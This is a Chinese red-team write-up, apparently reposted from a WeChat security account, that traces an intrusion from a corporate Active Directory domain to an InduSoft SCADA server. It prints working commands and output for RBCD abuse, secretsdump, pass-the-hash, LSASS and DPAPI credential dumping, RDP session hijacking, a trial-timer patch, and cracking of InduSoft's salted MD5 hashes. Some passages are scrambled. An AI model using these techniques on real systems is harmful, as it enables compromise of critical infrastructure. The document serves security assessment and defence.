红队 - 通过逆向 SCADA 软件入侵关键基础设施

介绍

能源、水务、医疗卫生、银行、MSP等关键行业的安全受到严格审查。NIS2指令正在敦促欧洲各组织领导层采取更积极主动的网络安全措施，以避免潜在事故的发生。

本文的目的是说明红队参与的过程以及网络攻击者在针对关键基础设施时如何采用各种技术和程序进行操作，同时也强调在维护由企业和工业网络组成的复杂 IT 环境时保持良好的安全态势的重要性。

我们创建了实验室，尽可能地复制目标环境，并在与真实系统隔离的情况下进行侵入式测试，以避免造成严重后果或导致生产环境中出现意外行为。本文所述的所有发现均已负责任地披露给受影响的组织，并已实施补救措施以解决在此次合作中发现的漏洞。

第 0x01 部分 - 在企业 Active Directory 中提升权限

初始访问 - 假定的违规场景

这次，我们的任务是在组织内部开展红队演练。客户提供了一台放置在服务器网络（VLAN）中的常规虚拟机以及其他生产设备，以便我们模拟攻击者在遭遇攻击（例如 RCE 漏洞、Webshell 等）时会看到的内容以及可能采取的操作。

与从独立的访客 WiFi 或特权 IT 管理网络启动相比，这是最现实的选择。该服务器的启动位置还算合理，因为它有合理的通信活动，可以访问其他公司资产，但并非所有资产。

作为参考，其他红队成员正在对面向互联网的资产进行外部渗透测试，并发现了一个高危漏洞，可能导致内部服务器被攻陷。在实践中，将外部攻击向量 + 内部攻击向量串联起来，实现从互联网到关键基础设施的完整攻击路径是可行的，正如我们将在本文全文中看到的那样。

密码喷洒 AD 用户

一旦我们在提供的虚拟机中站稳脚跟，作为起点并与我们的命令和控制 (C2) 建立连接，我们就会代理连接并开始扫描网络中的邻居，寻找活动的服务。

一般来说，扫描过程中最常见的资产是、、、、physical servers等等。domain controllers由于我们network devices (firewalls, switches)一开始没有密码或任何类型的凭证，所以我们首先瞄准的是 Active Directory 服务器。databasesstorage (NAS)application servers

我们轻松识别域控制器的一种方法是通过查找服务：

• SMB (445)，LDAP (389)，AD-DNS (53)和Kerberos (88)

当我们找到启用了这些服务的主机时，我们可以自信地说它是域控制器之一。

之后，我们使用kerbrute工具对数据中心的 Kerberos 服务进行了快速密码喷洒，并从使用空 SMB 会话从旧成员服务器获取的 AD 用户列表中找到了一个用户的凭据，该用户的密码与用户名相同。该用户只是一个普通的域用户，没有特殊权限，很可能被遗忘了。我们姑且称之为…… lab.localappuser1。

nmap -PS -sT s-sV -p 445,389,88 --open 192.168.99.0/24nxc smb -u '' -p ''192.168.99.0/24 --userskerbrute_linux_amd64 bruteforce --dc dc.lab.local -d lab.local -v userpass.txt

有了有效的域密码，我们能够通过 LDAP 协议使用BloodHound和ADRecon等工具更深入地枚举 Active Directory 域。

请注意，我们使用proxychains-ng SOCKS5通过提供的 VM 代理这些操作，利用“Living-off-the-Land”的优势，避免在“受感染”的机器内安装可能被 EDR 等主机防御措施捕获的东西。

C#BloodHound 工具拥有多个兼容的、以Rust或编写的摄取器，Python它们可以获取 AD 结构化数据并将其编译成图表，以表示域用户、安全组、组织单位 (OU)、组策略 (GPO) 等。在枚举过程中，我们远程使用了BloodHound.py摄取器。ADRecon 也可以在未加入域的计算机上使用安装了RSAT工具包的 PowerShell 远程执行。

bloodhound-python-cAll--zip-dlab.local-uappuser1-pappuser1--dns-tcp-ns 192.168.99.20-dcdc.lab.localADRecon.ps1-MethodLDAP-DomainControllerdc.lab.local-Credentiallab.localappuser1-GenExcelC:ADRecon-Report

滥用 MachineAccountQuota

在阅读上述工具生成的枚举输出时，我们注意到参数ms-DS-Machine-Account-Quota的默认值为10。这意味着任何域用户最多可以将 10 台计算机加入域。换句话说，攻击者能够在域（通常名为 ）中创建计算机帐户，COMPUTER$并使用预定义的密码。

利用默认配置，我们使用impacket-addcomputer.py-https://github.com/fortra/impacket/blob/master/examples/addcomputer.py在组织域中创建了一个ATTACKER$以我们的密码命名的新计算机对象。

$ addcomputer.py -computer-name 'ATTACKER$' -computer-pass'Password.123' -dc-host dc.lab.local 'lab.local/appuser1:appuser1'    Impacket v0.13.0.dev0+20250422.104055.27bebb13 - Copyright Fortra, LLC and its affiliated companies    [*] Successfully added machine account ATTACKER$ with password Password.123.

通过 RBCD 利用“WriteAccountRestrictions”DACL

通过仔细分析 BloodHound 的输出，我们注意到有一条从 升级到 的路径，Domain Computers因为Read-Only Domain Controller (RODC)安全Domain Computers组是组的成员Allowed RODC Password Replication，并且具有名为 的权限WriteAccountRestrictions。

这种配置似乎并不标准。相反，这可能是由于系统管理员在创建新服务器并将其提升到 (RO)DC 时配置错误造成的，但这种配置的根本原因尚不清楚。

我们执行了典型的 Kerberos 基于资源的约束委派 (RBCD) 攻击。这涉及将msDS-AllowedToActOnBehalfOfOtherIdentity属性设置为我们计算机帐户的 SID ATTACKER$。此配置允许我们通过使用凭据模拟Administrator用户。RODCATTACKER$S4U2Proxy

$ rbcd.py -delegate-to 'RODC$' -delegate-from'ATTACKER$' -k -action write -dc-ip 192.168.99.20'lab.local/ATTACKER$:Password.123'    [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty    [*] Delegation rights modified successfully!    [*] ATTACKER$ can now impersonate users on RODC$ via S4U2Proxy    [*] Accounts allowed to act on behalf of other identity:    [*] ATTACKER$ (S-1-5-21-1988370448-1183679873-2997581360-1604)$ getST.py -spn cifs/rodc.lab.local -impersonate 'Administrator''lab.local/ATTACKER$:Password.123'    [*] Getting TGT for user    [*] Impersonating Administrator    [*] Requesting S4U2self    [*] Requesting S4U2Proxy    [*] Saving ticket in Administrator@[email protected]$ secretsdump.py -dc-ip 192.168.99.20 -k -no-pass 'lab.local/[email protected]'    [*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)    [*] Using the DRSUAPI method to get NTDS.DIT secrets    Administrator:500:aad3b435b51404eeaad3b435b51404ee:71e236826b080ec3c22d7d4c31edc54e:::    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ab931b73c59d7e0c089c0:::    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9fd3a549dffd8c0715d90b9814febb28:::

现在你可能会惊讶（就像我们当时一样），为什么 DCSync 可以在只读 DC 上工作。事实上，RODC尽管名称实际上不是只读的，但它是一个普通的 DC，并且属于该Domain Controllers组。默认情况下，普通的 RODC 不会缓存用户凭据。

我们决定直接使用通过 Windows Management Instrumentation ( WMI) 的哈希传递攻击进入数据中心，在那里建立另一个反向 SOCKS5 连接并将其链接起来。现在，我们可以访问许多已加入 AD 的计算机，包括服务器、台式机，甚至一些来自多个部门的员工笔记本。

Active Directory 的利用部分不是本文的重点，因此我们将参考 SpecterOps 文档WriteAccountRestrictions ，其中解释了如何滥用此DACL，以及 Dirk-jan 的一篇博客文章，其中深入介绍了这些权限。

nxc wmi dc.lab.local -d lab.local -u Administrator -H 71e236826b080ec3c22d7d4c31edc54e -x 'cmd'

第 0x02 部分 - 转向受限网络并逆转 SCADA 安全性

发现有价值的资产

此时，我们已经成功入侵了公司 AD 域：获得了域管理员权限，可以伪造黄金票证，并远程访问几乎所有已加入 AD 的服务器和工作站。但这足以在我们的最终报告中证明其影响吗？对于网络安全团队、安全运营中心 (SOC)、IT 管理员和其他技术人员来说，这或许就足够了。

考虑到我们攻破域名的速度之快（部分原因在于我们使用了高质量的工具，并且现有的研究成果非常出色），我们仍然有充足的时间尽可能地继续我们的工作。在与客户协调后，我们决定继续评估，看看从域名管理员的角度可以采取哪些措施。

我们花了更多时间分析域结构、用户类型、组、组织单位和计算机，最终整理出一份值得关注的攻击目标清单。其中，一台名为 的计算机引起了我们的注意HISTORIAN.lab.local。

在研究这个主题之后，我们发现在从事工业和运营技术的组织中，使用用于数据收集和存储的应用程序是很常见的。

服务器的目的historian是收集、存档和提供对工业过程的时间序列数据的访问，本质上创建所有运行参数的全面历史记录，例如能源设施中的发电输出和电网稳定性参数、石油和天然气管道中的压力读数和流速，甚至水处理设施中的化学剂量和过滤器状态。

Historian 的凭证转储

由于我们拥有特权帐户、网络连接以及运行远程桌面协议 (RDP) 的服务，因此能够登录 Historian RDP。通过枚举系统，我们发现了报告软件和一些收集的数据。一些人员积极地使用这台服务器执行他们的工作任务。

我们对 Windows 中负责处理身份验证和安全机制的系统进程进行了转储lsass.exe。为了方便本文，我们尝试使用procdump64.exe工具转储该进程，然后使用mimikatz解析该转储（离线）以查找用户凭据或其他机密信息。通过这种方法，我们发现了一个新的凭据：SCADAsupplier01。

转储进程的方法有很多种。例如，可以使用蓝队用来提取系统内存内容的memory acquisition工具（FTK Imager、Magnet RAM ）创建完整的内存转储，然后使用类似volatility3的工具解析和分析RAM转储中的数据。其他选项包括访问虚拟机存储并获取包含虚拟机内存的快照（例如VMware.vmem文件）[3]。

请注意，该系统未配置 Credential Guard [4]和其他 LSA Protections [5]，因此更容易入侵本地安全机构进程。

一些攻击进程保护灯 (PPL) 的技术已经发布，例如PPLdump、PPLKiller、Dellicious以及其他可能现代的方法，或滥用易受攻击的合法驱动程序的类似工具（也称为自带易受攻击的驱动程序 (BYOVD)），但这超出了范围。

procdump64.exe-accepteula-ma-64lsass.exec:lsass.dmpmimikatz.exesekurlsa::minidumpc:lsass.dmpsekurlsa::logonPasswordsAuthenticationId : 0 ; 1927007 (00000000:001d675f)Session : RemoteInteractivefrom 2SID : S-1-5-21-1988370448-1183679873-2997581360-500ssp :[00000000]        * Username : supplier01        * Domain : SCADA        * Password : Password.123

进入 SCADA 服务器

关于服务器，另一个需要注意的重要方面HISTORIAN是可用的网络接口数量。这台服务器是双宿主机：除了连接到公司网络外，它还分配了另一个 IP 地址，用于与不同网络中不同 IP 范围的主机通信。

ipconfig使用诸如、netstat和 Microsoft Sysinternals tcpview64.exe实用程序之类的命令获取网络配置，以识别与运行 SCADA 软件的服务器建立的连接。

图片改编自NIST SP 800-82：操作技术 (OT) 安全指南。

假设SCADA服务器的IP地址为10.1.1.10。用户supplier01拥有SCADA服务器的远程桌面权限，并且是本地管理员。

在枚举该系统之后，我们发现：

• 运行时的 SCADA 项目InduSoft Web Studio

• 来自非活动用户的 RDP 会话remote.operator （已断开连接）

同一用户正在Secure Viewer运行一个进程。它是 InduSoft Web Studio 的一个桌面客户端组件，该组件提供对 SCADA/HMI 应用程序的安全远程访问。另一个瘦客户端可通过 Internet Explorer 访问，需要 ActiveX 控件和 VBScript。尽管 Edge 浏览器存在安全警告，但仍可以在“兼容模式”下运行旧版 Web 应用程序。

我们当时的目标是查看 SCADA 界面。然而，我们无法运行另一个进程，因为用户remote.operator已经启动了它。配置的服务器端口也已分配。出于显而易见的原因，我们无法在生产环境中停止或重启这些进程。

tscon.exe 下一个想法是以某种方式接管现有的、处于非活动状态的 RDP 会话。由于我们获得了该机器的权限，因此我们可以使用一种已知的技术通过劫持 RDP 会话。

我们所需要的是 SYSTEM 命令行，或者创建一个执行以下命令psexec.exe -s的服务：sc.exe

C:Windowssystem32>query userC:Windowssystem32>sc create sesshijack binpath= "cmd.exe /k tscon TARGSESSID /dest:rdp-tcp#MYSESSIONID"

一旦服务启动，我们的桌面就会连接到受害者的 RDP 会话。

最简单的方法是打开taskmgr.exe，右键单击断开的用户会话，然后单击“连接” ，但系统需要目标用户密码才能成功切换 RDP 控制台。

我们竭尽全力避免在生产环境中干扰该系统，因此tscon这次没有测试 RDP 劫持方法。为了访问在另一个用户上下文中运行的 SCADA 查看器，我们需要remote.operator用户密码，于是开始寻找它。

我们尝试使用DonPAPI工具远程转储 DPAPI 机密，从而泄露了remote.operator保存在配置为在系统启动时自动启动 SCADA 服务器的计划任务中的密码。

$ donpapi collect -t 10.1.1.10 -d '.' -u supplier01 -p Password.123    [💀] [+] DonPAPI Version 2.1.0    [💀] [+] Output directory at /home/user/.donpapi    [💀] [+] Loaded 1 targets    [10.1.1.10] [+] Starting gathering credz    [10.1.1.10] [$] [DPAPI] Got 7 masterkeys    (...)    [10.1.1.10] [+] Dumping User and Machine Credential Manager    [10.1.1.10] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{4BCE964B-970C-4C1E-BE22-56AF28B59777} - SCADAremote.operator:Password.123

我们提升了域权限，进入了历史服务器，切换到受限网络，获取了操作员账户密码，并劫持了 RDP 会话以访问桌面。然而，我们只收到了一条糟糕的ACCESS DENIED消息。

逆转InduSoft Web Studio

InduSoft Web Studio (IWS) 最初是一个专有的 SCADA/HMI 开发平台，后于 2013 年被 Wonderware 收购，并在被施耐德电气收购后成为 AVEVA 产品组合的一部分。该解决方案经过了显著的发展，已成为工业应用中部署最为广泛的 SCADA 开发环境之一。

该平台遵循现代 SCADA 解决方案的典型架构，具有独立的开发和运行时环境。开发环境允许工程师设计自定义 HMI 界面、配置标签、创建脚本以及与工业控制器 (PLC) 建立连接。项目开发完成后，可以编译并部署到执行实际监控功能的运行时环境中。

鉴于我们正在评估的关键设施的重要性，我们建立了一个独立的实验室环境来分析 InduSoft 软件，避免了生产系统中断的风险。我们的实验室设置包括：

• 与目标环境匹配的 InduSoft Web Studio 版本

• 配置为镜像生产 SCADA 服务器操作系统的虚拟机

• 示例项目文件的结构与我们在生产环境中观察到的结构类似

• 网络隔离，防止意外连接到操作系统

我们在泓格科技网站上找到了InduSoft Web Studio v8.0 和 v8.1 的安装程序。我们在虚拟机中安装了相同的版本，这样我们就可以安全地对该软件的组件进行逆向工程，分析身份验证机制以及“安全系统”的其余部分。

冻结时间

安装 InduSoft Web Studio 后，它在 中运行Evaluation Mode。它允许用户在 40 小时内试用该软件。

我们没有许可证，显然也买不起专门用于测试其安全性的许可证。毕竟，这次合作的目标是发现关键部门组织系统中的安全漏洞。我们必须考虑以下假设：

• 反向 InduSoft 许可证和激活 - 硬，需要加密、散列和按位运算才能理解密钥生成器。

• 卸载/重新安装并希望计数器将重置 - 没有用。

• 在评估计时器到期时拍摄 VM 快照并恢复它 - 不可行，我们在同一 VM 内部有工具，例如调试器、IDA 项目等。

• 通过修补几个字节来停止计时器 -它起作用了！修补jmp指令以避免分支到特定块并通过GetTickCount()调用停止计数器。

InduSoft Web Studio 最重要的模块是：

• Studio Manager.exe- 实际运行一切的主程序（入口点）。

• Studio.dll- Web Studio GUI 的主库。

• UniSoft.dll- 包含业务逻辑组件、配置和项目加载、API、多线程内容。

• score.dll- 它可能是“Studio Core”或“Security Core”。处理安全系统、用户身份验证、群组、用户权限等。

• RunUniReg.exe- 供 Studio Manager 加载的包装器UniReg.dll。

• UniReg.dll- 负责根据网络接口 MAC 地址和 CLSID 进行许可、激活和密钥生成。

这是在模块上修补时钟以确保我们有足够的时间进行安全测试后反编译的代码视图UniSoft.dll。我们观察到图形界面上显示的时钟与评估模式时钟异步，每10到15秒更新一次。修补后，它会冻结，并且可能永远不会到达00:00。

由于显而易见的原因，本文不会介绍通过激活站点密钥进行许可的方法，但我们在网上找到了一些关于密钥生成原理的提示。我将在这里分享一份在Scribd上找到的文档，并参考PLCForum上用户讨论站点代码和激活密钥的帖子：

安全系统

InduSoft Web Studio 实现了多层安全架构，控制对开发和运行时环境的访问。

该系统以可配置的访问级别管理用户和组，支持本地身份验证、跨项目的分布式安全性或 Active Directory 域集成。

所有安全设置均存储在加密数据库文件中，密码经过哈希和加盐处理，以保护凭据。该框架可精细控制哪些用户可以访问整个 SCADA 系统中的特定应用程序功能、屏幕和控件。数据库加密是专有的，但可以恢复密钥并还原内容。

请记住，这是一台运行时的生产服务器。我们无法停止或重启服务，而且 InduSoft 项目安全性拒绝在运行时修改数据库，因此很难修改或添加新的 SCADA 用户。

从进程内存中转储哈希值

在红队参与的测试中，我们能够从系统进程中转储数据库部分，而无需对专有数据库保护进行逆向工程。我们使用Process Hacker 2扫描内存中的字符串（用户名），发现了一个包含未加密数据库内容的配置部分，其中包含多个安全组、用户名及其哈希值。

对 memdump 解析出的 JSON进行美化后：

我们必须了解哈希值的类型，以及它是自定义实现还是有其他保护措施（例如加盐）。注意密码字段的大小写敏感性。

在使用 IDA Pro 调试 InduSoft 时，我们在登录函数中设置了一些断点，尤其是在。这些断点引导我们找到用户和密码比较函数，该函数会使用在小写密码前添加score.dll!SELogOn静态盐来生成 MD5 哈希值。在进行哈希处理之前，整个字符串被编码为：%@tE7(UTF-16-LE

• 密码存储和身份验证方案如下：MD5(UTF16LE(salt+lowercase(password)))

是时候在我们的破解机上安装专用显卡来设置hashcat 了，它可以破解 MD5 哈希值，并恢复 SCADA 用户的明文密码。我们生成了一个自定义的单词列表，并在每行前面添加了盐值，然后按照 Hashcat Wiki [10]中的说明%@tE7(使用 hashcat 模式。70

hashcat-m70-a0hashes.txt ~/tools/wordlists/password-wordlist.txt27ebfd4fa443ddda15ff6dd64f96be91:%@tE7(engineer 2b2f63dc665122bc867f7c94354a4af9:%@tE7(password.1239a288abb102206569d886fa96fc2c195:%@tE7(

在 SCADA 中进行身份验证

在我们的离线实验室中对软件进行了几个小时的逆向工程并破解了密码哈希之后，我们最终SCADA以具有开发和运行时访问权限的特权用户身份进行了身份验证。

结论

此次红队行动暴露了一个令人担忧的现实：关键基础设施仍然容易受到顽固攻击者的攻击，这些攻击者通过多阶段攻击链进行攻击。从企业网络中的一个简单立足点开始，我们能够逐步提升权限，跨越网络边界，最终控制负责关键服务的工业控制系统。

此次评估得出的主要经验教训如下：

• 当历史服务器等双宿主系统在企业和 OT 网络之间建立桥梁时，单靠网络分段是不够的

• 即使专用工业系统提供了很多安全功能，其用户/客户也未能正确配置它们（参见 AVEVA 网络安全部署指南）

• Active Directory 中的默认配置可作为初始立足点

• 现代 SCADA 系统的复杂性产生了巨大的攻击面，其范围超出了网络安全

• 工业软件中的遗留系统和开发捷径为攻击者绕过访问控制创造了机会

• 可访问性和快速登录需求绝不能成为关键系统使用弱密码或缺少 MFA 的理由——安全风险远远超过操作便利性

• 整个环境中常见的过度特权可能表明缺乏最小特权原则的执行

• 日志记录、监控和检测功能对于 IT 和 OT 网络都至关重要——如果没有可见性，攻击者可以在环境之间自由移动、提取凭据并在很长一段时间内不被发现地访问关键系统

管理关键基础设施的组织必须采用涵盖 IT 和 OT 安全的纵深防御方法，实施适当的凭证管理，并定期测试安全控制。

此外，研究结果强调了跨网络边界监控系统和对工业控制软件应用强制性安全更新的重要性——AVEVA Edge 已经取代了 InduSoft Web Studio，并且CISA.gov也发布了多份咨询报告。

参考

[1] SpecterOps，“WriteAccountRestrictions - 基于 DACL 的控制”，BloodHound 文档。链接：https ://bloodhound.specterops.io/resources/edges/write-account-restrictions

[2] Dirk-jan Mollema，“滥用 Active Directory 中计算机对象的遗忘权限 - dirkjanm.io” 安全博客，2022 年 10 月 27 日。可访问网址：https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory/

[3] Diverto，“从 hiberfil.sys 和内存转储中提取密码”，《信息安全战士》。2019 年 11 月 5 日。获取地址：https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

[4] Microsoft 安全团队，“检测和防止 LSA 凭据转储攻击”，Microsoft 安全博客，2022 年 10 月 5 日。网址：https ://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/

[5] Microsoft，“配置额外的 LSA 保护”，Windows Server 安全文档，2025 年 3 月 26 日。可访问网址： https: //learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection

[6] 美国国家标准与技术研究院，《运营技术 (OT) 安全指南》，NIST 特别出版物 800-82 修订版 3，2023 年 9 月。可访问网址：https://csrc.nist.gov/pubs/sp/800/82/r3/final

[7] Helpmax，“Configuring the Thin Client”，Web Studio 帮助。获取地址：http ://webstudio.helpmax.net/en/thin-clients-and-mobile-access/web/configuring-the-thin-client/

[8] Alexander Korznikov. 安全小贴士，“所有 Windows 版本均支持无密码 RDP 会话劫持功能”，2017 年 3 月。获取网址：https://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

[9] Helpmax，“项目安全”，Web Studio 帮助。访问网址：http ://webstudio.helpmax.net/en/project-security/

[10] Hashcat，“哈希模式示例”，Hashcat Wiki。可用：https://hashcat.net/wiki/doku.php?id= example_hashes

[11] AVEVA，“网络安全部署指南 - 安全概念”。 网址：https://docs.aveva.com/bundle/cybersecurity-deployment-security-concepts/page/1510579.html

原文始发于微信公众号（Ots安全）：红队 - 通过逆向 SCADA 软件入侵关键基础设施